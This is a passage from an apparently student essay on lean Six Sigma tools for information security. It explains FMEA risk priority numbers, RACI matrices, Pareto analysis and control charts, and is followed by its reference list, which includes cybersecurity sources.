A Risk priority number between 0 and 1,000 can then be calculated for each failure with the following formula : RPN = severity x occurrence x detection. The failures are then prioritised in descending order, the failure with the highest RPN, should be prioritised first when determining the most suitable preventive measures and/or corrective actions.  Once the best course of action has been implemented for the failures, the FMEA should be reassessed to determine effectiveness of the changes. A RACI matrix can be used when responsibilities for implementing preventive measures and/or corrective actions are being assigned after a FMEA has taken place[39]

RACI Matrix

The Raci matrix is a tool used on the human factor element of a  project, it is used by companies as a way of assigning, balancing and clearly identifying the tasks for a specific person or group of people in the project.
The matrix contains the participants in the project and the tasks to be completed, to identify what relationship each person has with a task, either of the letters R-A-C-I is assigned to the person with their involvement in the task, these letters symbolise the following instructions:

  • Responsible participate in the task to the best of their abilities.
  • Accountable Accountable for the results of the task
  • Consultedhave a particular expertise in which they can contribute if needed
  • Informed People who are in some way affected by the results of the task, thus in regard to that task they need to be keep informed of any decisions or changes been made, while not actively participating in the decisions or changes.

The role of accountability is usually assigned to the person supervising the project. This role should be assigned to only one person as duplication can cause confusion in the project, resulting in tasks getting delayed or being incomplete and wasted resources.[40]

 

Pareto Analysis

The pareto analysis is a simple, effective and commonly used tool when prioritising problems. The analysis is based on the 80/20 principle, where it’s estimated that 80% of problems come from 20% causes. It is used by measuring the causes or effects of a problem (such as the frequency or cost), with a goal of proprietarily improving the causes or effects that impact the greatest.
Often the 80/20 principle does not apply to the causes or effects, and other proprietarily tools such as the FMEA is used along with it.
The pareto chart is used to visually display and summarize the causes and effects by their impacts in descending order from left to right. Here it can be seen which causes and effects should be prioritised over others, and to confirm if the 80/20 principle applies to this problem a cumulative percentage of the total is presented as a line graph.[41]

Control Chart
A Control Chart is a visual tool often used in the control phase, it helps determine if a process is under  statistical control or not. This is done by showing  the level of variation with shifts and trends within the process, in the same way the run chart does but a run chart does not indicate when the process out of control, a control chart can in a way then be seen as an addition to the run chart, the only difference is in the fact that control charts has pre-calculated  upper and lower control limits, that displays when the process is not in control.
The control chart limits are calculated by first getting the mean of the sample, this is used to  estimate  the standard deviation with the following equation:

[3] “Toyota Production System,” Toyota Australia. [Online]. Available: http://www.toyota.com.au/toyota/company/operations/toyota-production-system. [Accessed: 18-May-2017].

[4] S.-Y. Lai, C.-H. Tsai, L.-Y. Wei, R.-K. Li, M.-J. Lu, and others, “The dilemma of Toyota Production System implementation: a case study of Taiwan machine tool industries,” Int. J. Acad. Res. Account. Finance Manag. Sci., vol. 5, no. 1, pp. 1–12, 2015.

[5] J. P. Womack, D. T. Jones, and D. Roos, Machine that changed the world. Simon and Schuster, 1990.

[6] “The Seven Wastes | 7 Mudas,” Lean Manufacturing Tools. [Online]. Available: http://leanmanufacturingtools.org/77/the-seven-wastes-7-mudas/. [Accessed: 09-Dec-2016].

[7] “Top 25 Lean Manufacturing Tools.” [Online]. Available: http://www.leanproduction.com/top-25-lean-tools.html. [Accessed: 18-May-2017].

[8] J. P. Womack and D. T. Jones, Lean thinking: banish waste and create wealth in your corporation, 1st Free Press ed.,  And updated. New York: Free Press, 2003.

[9] “Lean Thinking | Lean Principles | Lean Manufacturing Tools.” [Online]. Available: http://leanmanufacturingtools.org/39/lean-thinking-lean-principles/. [Accessed: 18-May-2017].

[10] “The History of Six Sigma.” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/history/history-six-sigma/. [Accessed: 18-May-2017].

[11] “Motorola’s Six Sigma Journey: In pursuit of perfection | Procurement | Supply Chain Digital.” [Online]. Available: http://www.supplychaindigital.com/procurement/motorolas-six-sigma-journey-pursuit-perfection. [Accessed: 18-May-2017].

[12] “What Is Six Sigma?” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/getting-started/what-six-sigma/. [Accessed: 18-May-2017].

[13] “The meaning of Six Sigma.” [Online]. Available: http://www.six-sigma-material.com/Six-Sigma.html. [Accessed: 18-May-2017].

[14] “Define, Measure, Analyze, Improve, Control (DMAIC Approach) | ASQ.” [Online]. Available: http://asq.org/learn-about-quality/six-sigma/overview/dmaic.html. [Accessed: 18-May-2017].

[15] “What Is DMAIC?” [Online]. Available: https://www.isixsigma.com/methodology/dmaic-methodology/what-dmaic/. [Accessed: 18-May-2017].

[16] “DMAIC Process, a great Six Sigma problem solving tool | ToolsHero.” [Online]. Available: https://www.toolshero.com/problem-solving/dmaic-process/. [Accessed: 18-May-2017].

[17] “New to Lean Six Sigma?” [Online]. Available: https://www.moresteam.com/new-to-lean-six-sigma.cfm. [Accessed: 18-May-2017].

[18] “Six Sigma Definition – What is Lean Six Sigma? | ASQ.” [Online]. Available: http://asq.org/learn-about-quality/six-sigma/overview/overview.html. [Accessed: 18-May-2017].

[19] “About ISO27k.” [Online]. Available: http://www.iso27001security.com/html/iso27000.html. [Accessed: 18-May-2017].

[20] “Planning for and Implementing ISO 27001.” [Online]. Available: https://www.isaca.org/Journal/archives/2011/Volume-4/Pages/Planning-for-and-Implementing-ISO27001.aspx. [Accessed: 18-May-2017].

[21] “ISO/IEC 27001 certification standard.” [Online]. Available: http://www.iso27001security.com/html/27001.html. [Accessed: 18-May-2017].

[22] “ISO 27001 | Guide to ISO 27001 Standards Information | NQA.” [Online]. Available: https://www.nqa.com/en-gb/resources/blog/december-2015/your-complete-guide-to-the-iso-27001-standard. [Accessed: 18-May-2017].

[23] “Lean Security Operations | The Security Minute.” [Online]. Available: http://www.thesecurityminute.com/lean-security-operations. [Accessed: 18-May-2017].

[24] Frederick Scholl, “A Lean Approach to Information Security | New Journal.” .

[25] Derrick Wright “Getting Lean on Security Operations” in Lean Security, 2008

[26] “Five common Web application vulnerabilities | Symantec Connect Community.” [Online]. Available: https://www.symantec.com/connect/articles/five-common-web-application-vulnerabilities. [Accessed: 18-May-2017].

[27] “Distributed Denial of Service Attacks – The Internet Protocol Journal – Volume 7, Number 4 – Cisco.” [Online]. Available: http://www.cisco.com/c/en/us/about/press/internet-protocol-journal/back-issues/table-contents-30/dos-attacks.html. [Accessed: 18-May-2017].

[28] “Social Engineering Attacks: Common Techniques & How to Prevent an Attack | Digital Guardian.” [Online]. Available: https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack. [Accessed: 18-May-2017].

[29] “Malicious Insider Threats Greater than Most IT Executives Think.” [Online]. Available: http://www.computereconomics.com/article.cfm?id=1537. [Accessed: 18-May-2017].

[30] “The Security Risks of Lost and Stolen Devices,” ITSPmagazine | Cybersecurity & Infosec News. [Online]. Available: http://itspmagazine.com/from-the-newsroom/the-security-risks-of-lost-and-stolen-devices. [Accessed: 18-May-2017].

[31] “Common Malware Types: Cybersecurity 101,” Veracode, 12-Oct-2012. [Online]. Available: https://www.veracode.com/blog/2012/10/common-malware-types-cybersecurity-101. [Accessed: 18-May-2017].

[32] “Six Sigma Project Charter.” [Online]. Available: https://www.isixsigma.com/tools-templates/project-charter/six-sigma-project-charter/. [Accessed: 18-May-2017].

[33] “Six Sigma Tools: Bar Charts.” [Online]. Available: http://www.sixsigmaonline.org/six-sigma-training-certification-information/six-sigma-tools-bar-charts/. [Accessed: 18-May-2017].

[34] “Run Charts: A Simple and Powerful Tool for Process Improvement.” [Online]. Available: https://www.isixsigma.com/tools-templates/control-charts/run-charts-a-simple-and-powerful-tool-for-process-improvement/. [Accessed: 18-May-2017].

[35] “Determine The Root Cause: 5 Whys.” [Online]. Available: https://www.isixsigma.com/tools-templates/cause-effect/determine-root-cause-5-whys/. [Accessed: 18-May-2017].

[36] “The Cause and Effect (a.k.a. Fishbone) Diagram.” [Online]. Available: https://www.isixsigma.com/tools-templates/cause-effect/cause-and-effect-aka-fishbone-diagram/. [Accessed: 18-May-2017].

[37] “Follow Brainstorming Basics to Generate New Ideas.” [Online]. Available: https://www.isixsigma.com/tools-templates/brainstorming/follow-brainstorming-basics-generate-new-ideas/. [Accessed: 18-May-2017].

[38] “An Affinity for Organized Thinking: A Diagram With Many Uses | iSixSigma.” [Online]. Available: https://www.isixsigma.com/tools-templates/affinity-diagram-kj-analysis/an-affinity-for-organized-thinking-a-diagram-with-many-uses/. [Accessed: 18-May-2017].

[39] “Quick Guide to Failure Mode and Effects Analysis.” [Online]. Available: https://www.isixsigma.com/tools-templates/fmea/quick-guide-failure-mode-and-effects-analysis/. [Accessed: 18-May-2017].

[40] “Balancing Roles and Responsibilities in Six Sigma.” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/roles-responsibilities/balancing-roles-and-responsibilities-six-sigma/. [Accessed: 18-May-2017].

[41] “Pareto Analysis – Decision-Making Skills Training from MindTools.com.” [Online]. Available: https://www.mindtools.com/pages/article/newTED_01.htm. [Accessed: 18-May-2017].

[42] “Control Chart,” Six Sigma Study Guide, 17-Apr-2014. [Online]. Available: http://sixsigmastudyguide.com/control-chart/. [Accessed: 18-May-2017].

[43] “X-Y Matrix.” [Online]. Available: http://www.whatissixsigma.net/x-y-matrix/. [Accessed: 18-May-2017].

[44] “VSM Value Stream Mapping | Lean Manufacturing Tools.” [Online]. Available: http://leanmanufacturingtools.org/549/vsm-value-stream-mapping/. [Accessed: 18-May-2017].

[45] “Scatter Plot | iSixSigma.” .

[46] “Scatter Diagram,” Six Sigma Daily. [Online]. Available: http://www.sixsigmadaily.com/scatter-diagram/. [Accessed: 18-May-2017].

[47] “Kaizen Creates a Culture of Continuous Improvement.” [Online]. Available: http://www.leanproduction.com/kaizen.html. [Accessed: 18-May-2017].

[48] “Andon – GoLeanSixSigma.com.” [Online]. Available: https://goleansixsigma.com/andon/. [Accessed: 18-May-2017].

[49] “Kanban | iSixSigma.” [Online]. Available: https://www.isixsigma.com/dictionary/kanban/. [Accessed: 18-May-2017].

[50] “5S.” [Online]. Available: http://www.six-sigma-material.com/5S.html. [Accessed: 18-May-2017].

[51] “Poka-Yoke – Six Sigma Terminology.” [Online]. Available: http://www.sixsigmadaily.com/poka-yoke/. [Accessed: 18-May-2017].

[52] “The importance of a 15-minute daily huddle with your team. ~ The Lean Leader.” [Online]. Available: http://www.leanleader.org/2015/05/the-importance-of-15-minute-daily.html. [Accessed: 18-May-2017].

[53] “An Effective Six Sigma Control Plan.” [Online]. Available: http://www.sixsigmadaily.com/creating-effective-six-sigma-control-plan/. [Accessed: 18-May-2017].

[54] “60% of small companies that suffer a cyber attack are out of business within six months. – The Denver Post.” [Online]. Available: http://www.denverpost.com/2016/10/23/small-companies-cyber-attack-out-of-business/. [Accessed: 18-May-2017].

Cite This Work

To export a reference to this article please select a referencing stye below:

Reference Copied to Clipboard.
Reference Copied to Clipboard.
Reference Copied to Clipboard.
Reference Copied to Clipboard.
Reference Copied to Clipboard.
Reference Copied to Clipboard.
Reference Copied to Clipboard.

Related Services

View all

Related Content

All Tags

Content relating to: "Cyber Security"

Cyber security refers to technologies and practices undertaken to protect electronics systems and devices including computers, networks, smartphones, and the data they hold, from malicious damage, theft or exploitation.

Related Articles

DMCA / Removal Request

If you are the original writer of this dissertation and no longer wish to have your work published on the UKDiss.com website then please: